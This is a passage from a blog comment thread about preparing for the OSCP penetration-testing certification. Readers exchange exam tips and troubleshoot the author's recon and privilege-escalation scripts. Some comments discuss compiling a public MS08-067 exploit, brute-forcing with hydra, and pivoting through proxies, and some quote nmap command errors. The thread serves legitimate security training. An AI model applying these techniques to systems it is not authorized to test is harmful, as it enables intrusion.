      Yes, that’s a sound approach but I wouldn’t try to master every topic on the syllabus before taking the course. The course will be providing you an opportunity to learn these topics. I would just try to understand some of the basics (scripting, bash, and some limited assembly) so you’re not struggling with these while trying to learn some of the more complex topics.

  78. ctg says:

    Thank you Mike. One last thing.. What would be considered the more complex topics?

    • Mike Czumak says:

      That’s a tough one to answer because it really depends on your background and I think the answer would vary depending on who you ask. Nearly every topic can get complex depending on how deep you want to explore it. I wouldn’t worry too much about which are the easiest or hardest, just enjoy the learning experience!

  79. AK says:

    Hey, Mike.

    I got my OSCP confirmation e-mail earlier today, so I just wanted to drop another thank you note for 1) writing this blog in the first place; 2) publishing your enum scripts, off of which I built my own; 3) all the additional helpful tidbits and elaborations in answering my questions. Students smarter and more experienced than I have failed this exam, but I passed on my first try. That is at least partially thanks to you.

    Have an awesome one!!

    • Osho says:

      Hey AK,

      Would you mind if asked you a few questions regarding the exam, since you just completed yours and I failed mine 🙂 The main reason being I was searching half the day for that vulnerable software which I had all along. Incredible mistake. I would like to ask you about two other machines I didn’t (one in particular) manage to compromise. If you want, you can send me an email on

    • Mike Czumak says:

      That’s great to hear, Congrats! I’m happy if I provided even the smallest contribution to your successful attempt.

      – Mike

  80. Jon says:

    Mike, This is a really great site and lots of information. I am in module 12 now as we speak and loving this course. If possible could you email me your OSCP notes. Please feel free to delete any content related to lab machines and such. I don’t want to spoil the fun. But your processes are very streamlined and could help save me a bunch of time and would love to see a different thought process. Thanks


    • Mike Czumak says:


      Sorry, but the only documentation I held on to was my final report, which of course I cannot share.

      – Mike

  81. gerhardt says:

    Mike, do you mind if I send you my exam report for review? I was kind of confused of how to follow the recommend lab report guide and how to include all steps so that someone can replicate my exploits exactly. I was a bit trigger happy with the screen shots and it sure as hell didn’t look professional. It’s only around 35 pages and yes, I obviously failed. Would really like some pointers on proper reporting as well as a question regarding one of the machines. Would really appreciate if you wouldn’t mind helping as I’m getting ready to take the exam next Wednesday again. Please let me know. Cheers

    • Mike Czumak says:


      First, sorry I took so long to get back to you. I was taking the OSCE exam this weekend and was off the grid for a few days. I would be happy to give you some pointers on your report writing but I can’t divulge any information regarding the exam targets. I’ll shoot you an email and answer what I can.

      – Mike

    • Mike Czumak says:

      FYI, I tried to email you at the address you provided via the comment but it was rejected by the mail server (account does not exist).

  82. gerhardt says:

    Hey Mike, thanks for responding. I accidentally had my email @yahoo instead of @gmail. How was the OSCE, I was planning on taking that at the end of this month? Best of luck! Also your windows buffer exploits were invaluable for me so I think you should have no problem with the OSCE.

    I’m taking the test as we currently speak and I’m probably going to root all the machines since I have 4 down already and am trying to escalate privs on the last one and I still have around 18 hrs left. But if you wouldn’t mind still looking over my previous report, since I plan on doing this one tomorrow and really would like some pointers of how to include all steps so that someone can directly follow it but place it in the structure that they provide. The email should work now; it was gmail, not yahoo. Thanks again for your benevolence, you’ve certainly helped a lot of people.

    • Mike Czumak says:

      Just resent the email regarding your report. Glad to hear things are going well on your exam. I passed the OSCE — great course, tough exam. I’ll be doing a write-up in the next couple of weeks.

  83. AK says:

    Hi again, Mike.

    I dropped by to leave a note for Osho that I responded to his request for help via his e-mail but never heard a reply.

    Congrats on passing your OSCE. I just started last week. I purchased 60 days of lab time, so I plan to have several weeks of practice time left by the time I complete the modules. In your upcoming blog, I would very much appreciate some hints/resources on how to best utilize this lab time. I read on another blog that, unless you’ve been doing exploit developments for a long time, you should prepare to fail your first attempt. I would like to avoid that if possible.

    Looking forward to your blog!

  84. Osho says:

    Hey AK, thanks for the reply! I never received an e-mail from you. My email is Regarding the OSCP, I am happy to say that I passed with flying colors after that first misstep. And the machine I needed help with (linux priv “smtp”) I actually did right the 1st time, just a tiny miscalculation. Thanks for still taking out the time to respond.

    I’m also planning on starting the OSCE by the end of this month (30th). Have you already started the course? Send me an e-mail if you would like to discuss the concepts that will be covered in the course as well as necessary preparations. Here is a really good resource I’ve been going through: don’t know if you’re aware of it, but it is definitely worth checking out. Let me know by e-mail if you want to discuss approaches to the course, etc. It really is helpful when you can shoot off ideas to someone doing the exact same thing. Cheers and best of luck w/ the course!

  85. mokaz says:

    Hi there Mike, just wanted to say thanks for sharing what you have from your OSCP experience. Could i maybe ask your email in order to potentially contact you at a later point? thanks a lot, best regards, m.

    • Mike Czumak says:

      Absolutely. I just sent you an email.

      • Mokaz says:

        Hi Mike,

        Just came back letting you know that I’ve successfully passed my OSCP challenge ! thanks for your write up and encouragements..


  86. Monty says:

    Awesome Summary Mike,

    I’ll be taking the Exam in a couple of weeks. I have a couple of question (No spoilers) that I would like to ask you. Do you mind if I sent them via email?


  87. syberdefender says:


    Can you send me an e-mail as well, for an offline question?


  88. Quoc Vu says:

    Great! Thank you a lot. It’s really helpful for me because I’m practicing with the OSCP lab.

    In the previous comment, You mentioned that “commenting out any type of vuln-scanners like nikto since it’s not allowed for the exam”, but I in the forum, they stated “We also prohibit the use of automatic exploitation tools (e.g. db_autopwn, browser_autopwn, SQLmap, SQLninja etc).Single-target scanners such as Nmap (and its scripting engine), Nikto, Burp, DirBuster etc are permitted to be used in the exam.”. Was Nikto prohibited in your exam?

    I’m also trying to do everything manually. But in the lab, there are many machines which are really hard to find the hidden URLs without tools like Nikto. How could you do it before?

    Thank you again.

    • Mike Czumak says:

      I don’t recall if Nikto was allowed or not but I do know that I didn’t use it nor did I use any automated vulnerability scanners. I did make use of tools such as Burp and dirb, the latter of which is very useful for quickly enumerating site content. You shouldn’t need to do *everything* manually — remember tools are your friends, both in the course and in your profession. The tools I would specifically try to avoid using as much as possible in the lab (and of course on the exam) are vulnerability scanners like Nessus, Metasploit exploit modules (this does not mean auxiliary modules or msfpayload), and other auto-exploit tools like you mentioned above.

  89. dee gee says:

    Hi Mike,

    This is an amazing material and I’m glad you decided to share it selflessly. Congratulations on your success with OSCE!
    Was wondering if I could pick your brain regarding your recon scripts. I’ll appreciate your help.


    • Mike Czumak says:

      Thanks so much for the feedback Dee. I just sent you an email re: my recon scripts.

  90. Jay says:

    Hey Mike,

    Great info on the OSCP Exam! I begin the course in two weeks and the information you provided has me very confident on passing the exam.

    Would you recommend this exam for someone with liitle linux and scripting experience?

    • Mike Czumak says:

      Thanks Jay. As I’ve said in some of my previous comments/post, I would recommend brushing up on basic linux/windows/scripting before taking the course as there are a lot of great topics that you’re going to be deep diving into and the last thing you probably want to do is struggle with some of the basics.

      – Mike

  91. lostindividual says:

    Hi Mike,

    Mind if I ask you some offline questions in regards to OSCP? I’m currently taking the course and I hoping you can help me refocus myself here. Thanks in advanced.

  92. Steve Campbell says:

    I’m taking the PWK course now. Thanks for the OSCP review and scripts. I know that the recon-scan scripts won’t work as-is because of the hard coded paths, but I’ve found reading through them very valuable in understanding how to automate nmap scans in Python. I looked through libnmap and python-nmap modules, and they are a little more complex for a Python beginner to understand. Your scripts are much more simple and the ideas found in them can be used to automate virtually any command line tool used in pentesting.

    Thank you!

  93. anon2root says:

    Just saying thanks for the windows exploits csv file, it saves a lot of time :). Also, the priv-esc and recon scripts are cool and can provide an excellent starting point to develop/refine our own scripts.
    Thanks alot man, keep it going !

  94. Reznov says:

    Tons of thanks Mike for this marvelous review, am also planning to take the PWK course as soon as possible, but need a few things to take my skills more and more to a high levels to be just sure of exceeding the exam!

  95. Brandon says:

    HI Mike,
    It’s great from you to share your experience.

    I’m already starting the internal lab for the OSCP exam. Now, I’m in the IT panel but I have some troubles to down the hosts and

    Could you give me somes clues about them,please?


  96. Benjamin B says:

    The thing that is holding me back is the 5-6 hours a day and 6hour a day during the weekend. Who has that time available to him ? I surely don’t. Or maybe I didn’t understand it well.

    My idea was spending 4hours top during the week and maybe an hour or 2-4 during the weekend. Think that should do it with the 90day pack ?

    • Mike Czumak says:

      Difficult for me to say. I tend to go off on various research tangents when I’m taking any course so the time I spend is not necessarily reflective of what it would take to simply finish the course and attain the cert. The good news is you can always buy extensions if need be.

  97. Lucas Bader says:

    Hey, awesome writeup! I’m an OSCP since April and your review was really helpful in preparation for the exam. I wrote a similar enumeration Script in Python and tried to make it strictly modular. If you want you can check it out :

  98. Chris says:

    Any OSCP’s out there interested in offering tutoring services? I need some guidance that I’m more than happy to pay for.

  99. FreshMan says:

    Hi Mike,

    Your post on OSCP is definitely an asset for network security students like me.
    Is it possible for you kindly give some tips on sufferance without giving to much?

    I am stuck on this machine for days.



    • Mike Czumak says:

      Just sent you an email.

      • Thristo says:

        Hi Fresman, i’m in the same state you were in i guess,

        i thought no machine is going to stop me after rooting ghost and pain, until i faced “Sufference”.

        So is it possible to give me some tips based on my progress (on sufference) without giving too much (of course) ?

        Thanks =)


  100. R Singh says:

    Thanks Mike for your wonderful post. You definitely are a huge inspiration.

    I am a CISSP, CISA, CRISC, CEH, ECSA, SCSA and now working on my OSCP. By far, this is the Supreme of all certifications. I am lost, confused but very positively motivated.
    I have a great amount of hands on windows/linux/unix; very less on scripting though and not much on Pen Testing. I have pwned 14 machines so far in the lab (with the help of metasploit and some manual public exploits). I am stuck and looks like brain freeze. I have not yet found the Pivot point to the lab network. I can spare at least 15 hours a day to get to the target OSCP within 1 month.

    I would need a strong nudge so that I can get back on track and start thinking like a Pen Tester and be on my target.

    I was running your recon scripts and I am getting this

    root@kali:~# ./recon_scan/
    #### RECON SCAN ####
    #### A multi-process service scanner ####
    #### http, ftp, dns, ssh, snmp, smtp, ms-sql ####
    INFO: Running general TCP/UDP nmap scans for
    INFO: TCP/UDP Nmap scans completed for
    INFO: Detected http on
    INFO: Performing nmap web script scan for
    INFO: Detected ftp on
    /bin/sh: 1: ./ not found
    /bin/sh: 1: ./ not found

    I would really appreciate if you could get back to me.

    Best Regards,

    • Mike Czumak says:

      Just sent you an email

    • Benjamin B says:

      Hi there,

      concerning your script errors :
      put yourself in the same folder as the script when executing and make sure the script is in the same folder.

      Will be starting my OSCP in the near future when I prepared myself a bit more. doing prep courses like python, nmap & nmap scripting engine, playing with metasploitable2 … I just don’t have 15h a day to spend on this course like most people do. But I do think that with enough preparation, 90 days and maybe an additional 90 days I should be fine.

  101. R Singh says:

    Thank you so much Mike and Benjamin. I was running the scripts while in a different folder but when I ran the recon script from the same folder, there was no issue.

    Thanks again and great work Mike.

  102. Steve Campbell says:

    Hi Mike, I’ve been stuck on Bob for a week. I got a low priv she’ll and have tried numerous things, but I’m not sure if I’m going in the right direction. Can I ask you a couple of questions by email and get a nudge in the right direction?

  103. Johannes Hatting says:

    Hi Mike. First i wanna thank you for this great blog post and for the time you’ve spent answering peoples questions.
    I’m starting the OSCP in August and preparing myself by going through the topics in the syllabus.
    I fell pretty confident in most of the topics after lots of practice and i’ve been going through the megaprimers on sec. tube like you’ve recommended others and fell i have an ok grasp of the buffer overflow topic and using Immunity and Gdb.

    At the moment i’m trying to debug, modify and compile the different exploit listed on your exploit-sheet and like others i can’t get the 7104 service code exec (ms08-067) to work. I can see in an earlier answer from you, that you’ve managed to get it to work, so i was hoping that you could show me how you do it, to learn from it?

    I’m trying on a win 2k pro SP4 and attaching services in Immunity, but i can’t seem to get it to crash in a way, where i can find where EIP points. Every time it crashes it hits the SEH-chain. I’ve tried exchanging the “JMP ESP” part in the code with “BBBB” or a “JMP ESP” from USER32.dll module and setting a breakpoint here, also with “\xCC” in different places, but can’t seem to hit any of it. If you could get me started with getting EIP, maybe i could figure the rest from there. As i read the exploit it puts in the shellcode before (in lower mem.) than the return address, then moves ESP (sub esp) before the shellcode and finally jumps to ESP and the shellcode.

    Best Regards.

  104. emilia says:

    Hi, thank you for this great blog. I have a really stupid question but I’ve asked 2 times via the contact form on offensive security website without receive any answer.

    Is it possible to pay for the course with Paypal? I’m from Italy.

    Thank you.

  105. Vex Woo says:

    Hi, Mike. Thanks for sharing. It’s a great tutorial for us in PWK.
    This is a good link provided by SecurityTube.

    Thanks ! Wish you good luck !

  106. OSCP student says:

    Hey Mike,

    Did you use your scripts in the lab environment? Did you run them once for every server or really for the complete range in one go?

    I’m having problems with some of the server in terms of stability, e.g. the .202 server does not seem to receive an NMap scan well, the NMap scan is now running for 7 hours and is at 90% … Did you experience problems like this?

    Thx a lot for the scripts, adding the users to the user list seems relatively easy since a number can be found on one of the first servers using an NMap SNMP scan … For passwords I just added the top-2000. Could you estimate how long a hydra session would run with 2000 passwords for one existing user?

    thx a lot for the info

    • Mike Czumak says:

      Thanks. I did use the lab to fine tune my scripts a bit and modified them as I went. I performed some basic discovery/scanning across all servers and then performed more robust targeted scans against each server as I went. You will find that certain hosts may take longer than others and you might want to adjust your scan parameters accordingly. For example, take a look at the parameters your passing your nmap scans. Are you performing a full TCP and UDP scan for every server? If so, it’s going to take a long time. If you’re going to do one large scan you might choose to narrow down the scanned ports/services a bit to catch the low hanging fruit. Then you can adjust your scan parameters to make it more robust if you want to scan a one or several servers in more depth. It’s hard for me to estimate how long a hydra session will take since it can vary depending on several factors including the service(s) you’re scanning, the response time from the target server, and the number of threads you’ve configured.

  107. OSCP student says:

    Hey Mike,

    If you want, send me an email? There are some questions I have on the scripts and some remarks as well.

    I did indeed just throw a full UDP and TCP scan (in paralel) at each server 🙂 In the mean time I got a little bit smarter at scanning and enumerating.

  108. Manish says:

    Hi Mike,

    I have found your article and it is really informative. I am trying to using your script but it is showing me a error. Although i am quite beginner with the pyhthon scripting language. I am getting the following error after running the script.

    File “”, line 179, in
    f = open(‘results/exam/targets.txt’, ‘r’) # CHANGE THIS!! grab the alive hosts from the discovery scan for enum
    IOError: [Errno 2] No such file or directory: ‘results/exam/targets.txt’
    I have also changed this but still same error.
    I am using Kali platform.

    Thank you

    • Mike Czumak says:


      It’s exactly as it says…you don’t have the file/directory created. A couple of recommendations…first, spend some time researching the error as well as the basic file I/O operations within python to get a better understanding of how it works and how to fix it. Second, the scripts I provided were not meant to run out-of-the-box but rather to give an idea/concept of how I approached the course/exam. Had I had more time, I would have done a much better job of coding these. Don’t expect to simply use these as-is…instead review the approach, understand the concepts, and take the time to write your own.

      – Mike

  109. Danny Wong says:

    Hi Mike, Thanks for leaving the tip. I got it working as well based on your comment.

    “I simply had to add the following to get it to compile successfully: #pragma comment (lib, “User32.lib”).”

  110. Jennifer says:

    Hi, Mike,

    Thanks for sharing the great tutorial. It helps my a lot. I’ve got most of the boxes in the lab. But I have no clues with and Could you please send my an email and give some guidance on them?

    I appreciate your help,


    • Mike Czumak says:

      I’m not sure which two boxes those are (IPs vary) and I try to avoid giving any specific hints for how to pwn the boxes but I sent you an email in case you have a specific question that I can try to help with.

      • Sam G says:

        Hi Jennifer
        which machine did you start first? I am currently just in this state do not know where to start, they all look like have vulnerability but could not figure out where to start.

  111. Sam G says:

    Hi Mike

    That is great tutorial and I am glad to see you still answering questions on this post. I finished the reading material and start working on the lab machine. Is there a good starting point in the lab, like the easiest one I should start with? or should I just follow the number. I am scan each machines but just do not know which one I should focus first?

    Thank you for your help

    • Mike Czumak says:

      The thing to keep in mind here is that (in contrast to an actual pentesting engagement) all of these targets are vulnerable in some way so the starting point is really up to you. You’ll find that some may need to be tackled before others, but I simply started numerically and worked my way through the list t (and took out as much of the “low hanging fruit” as possible).

  112. Ashish Kamble says:

    Hey Mike,

    I had a question for you.

    I have about a 2 weeks left for my labs to commence, can you point out on what i should look upon. Can you mail me, had some more questions.


    • Mike Czumak says:

      What you should look at in the weeks remaining before you start the labs is really dependent upon your comfort level with the course material so it’s tough for me to help with. I sent you an email in case you have some more specific questions.

  113. David says:

    I’ve already passed OSCP but I wanted to ask some questions about your exploit excel sheet. How did you gather all those privilege escalation exploits? and how could you know the exact windows versions and service packs it works on? The same question goes for the exploits part.

    I just wanted to create my updated list of privilege escalation exploits with the exact versions and service packs as you did and share it. So please tell me.

    • Mike Czumak says:


      There’s a few sources I used. Since, in this context, I was concerned with only those vulnerabilities that have corresponding exploits I started with exploit-db. You can either use a Google search (e.g. privilege escalation windows or use the in-site advanced search function to narrow the results (e.g. set the platform to “windows” and search for “privilege escalation ms”.). The exploits themselves typically either reference the affected version / SP or at least the MS # so you can look it up . You can also use a site like CVE Details (, filter by OS and choose the desired vulnerability category (e.g. gain privileges). Then you can sort by exploits available. For completeness I also reference Technet directly for vulnerability version and service pack applicability.

      Hope this helps.

      – Mike

  114. Richard says:

    Great post. I highly appreciate it. I’m beginning prep work for OSCP and am trying to run your I apologize for asking but I keep getting “failed to open normal output file /root/scripts/recon_enum/results/exam/x.x.x.x/24.nmap for writing QUITTING” when running the script after defining the target IP range. Any ideas/hints? I admittedly am a Python beginner. Thanks.

  115. Felix says:

    Hi Mike,

    great job on the writeup!

    I was coming across your linuxprivchecker script and I think the ability to recommend some exploits for further investigation is outstanding as all the other automated Linux Post Exploitation tools doesn’t offer this feature (at least as far as I know, I think I have heard about some kind of semi commercial tool but I forgot the name).

    How have you created the exploit list? By hand? I cant think of a way to extract the needed informations from the edb website (using curl or something else) or from searchsploit. They are simply not organized enough I think. So, to make a long story short: I am interested in updating your scripts exploit db but have no idea to do this without doing it manually 🙂 Any hints on this?

    Best regards and thx again for the great work!

    • Mike Czumak says:

      Thanks Felix. Yes, I did most of it manually, primarily using Google as my means to find/narrow down the applicable exploits

  116. prakash says:

    Hi Mike,

    First of all Many congratulation to your OSCE certification. I was googling for OSCP certification and found your website and really it is very useful for those who are planning for offsec certifications. please let me know one thing that before going to enroll, can I prepare all these topics with myself? I mean with google help or with some security tube sessions? actually 10-12 years back I studied for c and c++ and also I know little bit about bash but don’t know about perl and python. I think theses script will play a major role for certification. please suggest.


    • Mike Czumak says:

      I’m a big believer in self-study. I’ve acquired far more practical skills and knowledge on my own through reading and, more importantly, hands-on practice than I have in any formal education setting. So can you do it yourself? Absolutely. You just have to be willing to put in the time and work. Review the syllabus and start exploring the various concepts. I would just caution against trying to rush to get a certification just to have it. Instead, use it as a milestone in your personal education pursuits to test your knowledge and provide some rigor/purpose to your studies. Best of luck.

      – Mike

  117. Alex Meque says:

    Hello Mike,

    Glad to see your post, It is awesome.
    I need some help regarding IP 202.
    I am fighting with a web application on port 80 since 2 months.
    Please help me, i am running out of time.

    • Mike Czumak says:

      Sorry, just got to your comment. As I tell everyone, I won’t give answers but I sent you an email in case I can be of any help as a sounding board.

  118. Sharrone says:

    Hello! Thank you for this review. It is and wll continue to be very informative. I am currently taking the course and wanted to see could you share a sanatized version of your notes. Not with the systems but more specifically the part with the pentest process information. I am trying to make sure my notbook has plenty of detail and information from different points of view.

  119. niranjan says:

    nice article good information about offensive security…

  120. Christopher Hammond says:

    Very nice article, thanks, and congrats on the cert! I can’t believe people are asking for your notes. Even after you generously provided the scripts. Especially since the Offsec motto is: “Try harder!” and rtfm (read the freaking manual PG13 ver.) ;^); is generally the spirit of the linux community.

    I agree with you about writing your own version for the learning experience. Oh, and thanks for the links to assembly and debug tutorials. Karma will definitely hook you up! 😀

  121. Sumesh says:

    Hi Mike,

    I am trying exploit

    7104 is compiled successfully ,I am running from a xp machine, I have reverted the machine prior to exploiting but I get error 192.x.x.x\pipe\browser\failed for 7104 and RpcExceptionCode()=1722 for exploit 6841

    MSF exploit works fine, please help. I am trying to understand what is going wrong

  122. dturner says:

    This is a great post! I’m currently going through the course myself and your priv escalation scripts are awesome. Could you explain your priv escalation methodology as that is definitely my weakest point. Thanks in advance!

  123. jj says:

    Thanks for the great post, helped me think about how to approach the class.
    Just wanted to make a note I found a copy/paste bug that prevents mssqlEnum from being called (which probably means it’s not necessary), would be nice if there was a github for these scripts. Great writeup.

  124. Avik says:

    Hi Mike,
    Thanks for your script and exploit list.Its really helped me pwning some system in OSCP lab. Still I have 10 system root only with 6 unprivileged shell. Would you mind sending me an e-mail for communicate?

    I don’t have many days left in lab and I stuck with privilege escalation every time.Instead of just relying on list of exploits,I would like to know more about attacking strategies to honing my focus on attacking strategies . Could you please help me on this!

  125. John Edwards says:

    Hi Mike,
    How would you typically use the reconscan scripts through pivoting e.g. let’s say you have compromised a machine in an internal network, got root and managed to setup a socks proxy on that machine via ssh. One would typically modify the proxychains file on the attacking machine and add the local socks port to it.

    Wouldn’t you then need to prefix “proxychains” to each command in the reconscan scripts e.g. nmap, hydra?



  126. John Edwards says:

    Hi Mike,
    That’s one of the best reviews on OSCP course on the Internet.

    Had a quick question about pivoting as I am working through the OSCP lab. Did you come across scenarios where you had to pivot through a Windows host to get to a different network? If yes, how did you achieve that – did you use Meterpreter or another technique(s)? Meterpreter seems to be the most popular technique over Windows and Linux systems.

    On Linux, one may get lucky and discover an openssh server.

    I am assuming that in the exam, you did not get tested on pivoting. Is that right? Just asking since meterpreter use appears to be quite limited in the exam.

    Thanks and Kind Regards,


  127. Tony G. says:

    Dear Mike,
    Thank you for the wonderful blog. I am able to compile 7104.c with Visual Studio C++ 2005 but can’t seem to get it working for XP. I have changed the ret address as per the return addresses on the metasploit netapi… but can’t get it to work on Windows XP SP2/3. Any help will be greatly appreciated.

  128. Dave says:

    Mike…i’ve one across exploit code for XP that is visual studio…is there a way to compile this on linux or buckle down and get VS 2008 express (can’t find 2005 express anywhere)/

  129. Hans Peter says:


    firts: nice blog post! Im doing the OSCP as well and you really helped me out a lot.
    Do you still have your KeepNote notes (not the ones of the lab, but the study notes)?


  130. Xionc says:

    Hello Mike,

    Thank you for your very interesting review of PWB course. I am currently taking PWK challange and I have just finished video and pdf materials. I started the network penetration with the lowest hanging fruits, which means MS08-067. I saw in comments on your site that I am not the first person that is struggling with 7104 exploit from exploit-db. I also saw that you were able to compile and successfully run this exploit against network targets. Although I am able to compile this code in both Kali (mingw32) and Windows (Visual Studio 2010) with no errors, I cannot use it against any vulnerable host (both with wine and in Windows environment). I receive the message that the connection failed. I have 100% exploitable targets (checked previously with metasploit) after fresh revert.

    Could share with me your working exploit source code? Thanks in the advance.

  131. Siamak Heshmati says:

    Great review!
    Thanks for sharing your experience.
    I registered for the course 3 days ago.

  132. says:

    Hi Mike

    Tx for the review…My exam is on the 30 May and stressing bigtime…
    I as well are currently at a wall, getting pass restictions , scripts will help for sure and any other tips that you can give that will help me in the exam….I did the CEH and played around for a while but i want to be a Pen tester thats why i am doing this course…..will be very thankful for any help


  133. Gina says:

    Hi Mike,

    I know this may be a novice question but when you ran scripts to do most of the enumeration, how did you have to annotate that in your report? Did you have to break it down step-by-step of just write something like “Script one was ran to return IP,DNS and OS details.” Also, do you mind sharing how long your report ended up being?

  134. AC says:

    Hi Mike,
    Do these scripts work in Kali 2? I get the following error, even when forcing the script to be ran under python 2.7

    Failed to open normal output file /root/scripts/recon_enum/XXXX.nmap

  135. mark says:

    I get this error. anyone knows how to fix? I modify the directories.

    INFO: Running general TCP/UDP nmap scans for
    INFO: Running general TCP/UDP nmap scans for
    Failed to open normal output file /root/scripts/recon_enum/results/exam/.nmap for writing
    Failed to open normal output file /root/scripts/recon_enum/results/exam/ for writing
    Process Process-2:
    Traceback (most recent call last):
    File “/usr/lib/python2.7/multiprocessing/”, line 258, in _bootstrap
    File “/usr/lib/python2.7/multiprocessing/”, line 114, in run
    self._target(*self._args, **self._kwargs)
    File “”, line 110, in nmapScan
    results = subprocess.check_output(TCPSCAN, shell=True)
    File “/usr/lib/python2.7/”, line 574, in check_output
    raise CalledProcessError(retcode, cmd, output=output)
    CalledProcessError: Command ‘nmap -vv -Pn -A -sC -sS -T 4 -p- -oN ‘/root/scripts/recon_enum/results/exam/.nmap’ -oX ‘/root/scripts/recon_enum/results/exam/nmap/_nmap_scan_import.xml’ ‘ returned non-zero exit status 1
    Process Process-1:
    Traceback (most recent call last):
    File “/usr/lib/python2.7/multiprocessing/”, line 258, in _bootstrap
    File “/usr/lib/python2.7/multiprocessing/”, line 114, in run
    self._target(*self._args, **self._kwargs)
    File “”, line 110, in nmapScan
    results = subprocess.check_output(TCPSCAN, shell=True)
    File “/usr/lib/python2.7/”, line 574, in check_output
    raise CalledProcessError(retcode, cmd, output=output)
    CalledProcessError: Command ‘nmap -vv -Pn -A -sC -sS -T 4 -p- -oN ‘/root/scripts/recon_enum/results/exam/’ -oX ‘/root/scripts/recon_enum/results/exam/nmap/’′ returned non-zero exit status 1

  136. Peter says:

    Hello thank you for all the info, is a great help with study prep!

    I am attempting to run your however I get the below errors for each new IP in the targets.txt file that is listed. I hav created all required folders.

    Failed to open XML output file /root/scripts/recon_enum/results/exam/nmap/ for writing
    Process Process-1:
    Traceback (most recent call last):
    File “/usr/lib/python2.7/multiprocessing/”, line 258, in _bootstrap
    File “/usr/lib/python2.7/multiprocessing/”, line 114, in run
    self._target(*self._args, **self._kwargs)
    File “”, line 110, in nmapScan
    results = subprocess.check_output(TCPSCAN, shell=True)
    File “/usr/lib/python2.7/”, line 574, in check_output
    raise CalledProcessError(retcode, cmd, output=output)
    CalledProcessError: Command ‘nmap -vv -Pn -A -sC -sS -T 4 -p- -oN ‘/root/scripts/recon_enum/results/exam/’ -oX ‘/root/scripts/recon_enum/results/exam/nmap/’′ returned non-zero exit status 1

  137. Jack says:


    I am having trouble modifying your scripts.

    1. Can we see an example out put of the script?
    2. What directories do we need to create to have the scripts run successfully?

  138. Ganesh Balaraman says:


    You are genius making invention in security.Very nice to your knowledge points.We came to know about this information through google groups community.

    I have some clarifications on Exploit Python script:



    # Now check for relevant exploits (note: this list should be updated over time; source: Exploit-DB)

    How can we pull this information from exploit-db and update in the script.

    Please advice

  139. Ganesh Balaraman says:


    I tried running the linuxprivhcecker script and seems to be working.But Mike advised to update exploit entries at the sploit section.I have checked the exploit-db database and entries are totally different.

    Can anyone please help on this issues.

    MIke says in the script like :

    # Now check for relevant exploits (note: this list should be updated over time; source: Exploit-DB)
    # sploit format = sploit name : {minversion, maxversion, exploitdb#, language, {keywords for applicability}} — current keywords are ‘kernel’, ‘proc’, ‘pkg’ (unused), and ‘os’

  140. says:

    I have completed my OSCP labs and will be taking up exam in next 1 month. Just needed some pointers for Unabtu and windows server 2008 machines, as i had lot of difficulties with these two OS and pointers specially for these two with respect to oscp. Any general pointers for exam will also be helpful.

  141. Bobby Digital says:

    What does “Solid Understanding of Networking” mean? I’m by no means a CCNA but i’ve been in IT as a systems admin for several years but more on the server side of things and some networking but mostly simpler things. I’m just trying to figure out if i have to worry about knowing how to subnet or something or can the ability to build a network from scratch and setup vlans be enough as a foundation for the OSCP? I assume that i should know the OSI layer but what parts of it are important to the OSCP. I’m basically trying to figure out if my knowledge is enough to take a crack at the OSCP or if i’m going to need more knowledge to have less of a struggle doing the course. I already know that i’ll need to learn python or perl or both and brush up on linux but the networking side i’m just trying to get more clarification on. I don’t want to take the course until i’ve got a bit more in my skill set.

  142. Akis says:

    it was an extra directory /nmap/ which i did saw 🙂

  143. STEVEN D CAMPBELL says:

    Akis: look at the paths in the error output. You’ll have to either recreate the same folder structure or modify the script.

  144. SWarsi says:

    Dear Mike,

    I have been working on OSCP lab and in search of articles about covering the course contents, to root all lab machines first. I have no doubts, that your this write up, is the BEST!!! among all blogs. A BIG THANKS for this blog and scripts!!!
    I am going to try those scripts as I am stuck in the lab after rooting 18 machines (low hanging fruits). I hope you are still keeping an eye on this blog.


  145. SWarsi says:

    Hi Mike,

    Do you have any post exploitation script for Windows handy?


  146. SWarsi says:

    Hi Mike,

    I posted some comments earlier, but looks like that did not go through. I want to repeat that your blog is by far the BEST I ever read for OSCP with practical approach and all important helps. BIG THANKS to you for posting it along with the scripts.